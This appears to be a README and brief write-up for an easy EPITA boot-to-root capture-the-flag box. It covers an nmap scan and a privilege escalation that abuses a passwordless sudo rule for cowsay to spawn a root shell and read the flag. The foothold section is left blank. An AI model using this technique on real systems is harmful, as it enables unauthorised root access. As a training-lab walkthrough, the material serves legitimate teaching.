73 lines
1.0 KiB
Markdown
73 lines
1.0 KiB
Markdown
# JI EPITA - CTF
|
|
|
|
#### Challenge Type : boot to root (box)
|
|
#### Difficulty : easy
|
|
|
|
----
|
|
## Running the challenge.
|
|
|
|
You can run the challenge using docker.
|
|
|
|
### with Docker compose
|
|
|
|
```
|
|
cd docker
|
|
sudo docker compose up --build
|
|
```
|
|
|
|
### Building and running the docker image
|
|
|
|
_todo_
|
|
```
|
|
```
|
|
|
|
## Writeup
|
|
|
|
### Enum
|
|
|
|
Scan the IP using nmap for open ports
|
|
|
|
```
|
|
nmap -p- ip
|
|
```
|
|
|
|
The port 22 and 31337 are open.
|
|
|
|
We find that there is a web service on port 31337.
|
|
|
|
### Foothold
|
|
|
|
...
|
|
|
|
### Privesc
|
|
|
|
We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password.
|
|
|
|
```
|
|
User l33t may run the following commands on srv1prod:
|
|
(ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
|
|
```
|
|
|
|
Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.
|
|
|
|
[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)
|
|
|
|
```
|
|
TF=$(mktemp)
|
|
echo 'exec "/bin/sh";' >$TF
|
|
sudo cowsay -f $TF x
|
|
# id
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
# cat /root/root.txt
|
|
epita{th3-sup3r-c0ws4y}
|
|
```
|
|
|
|
Solved !
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|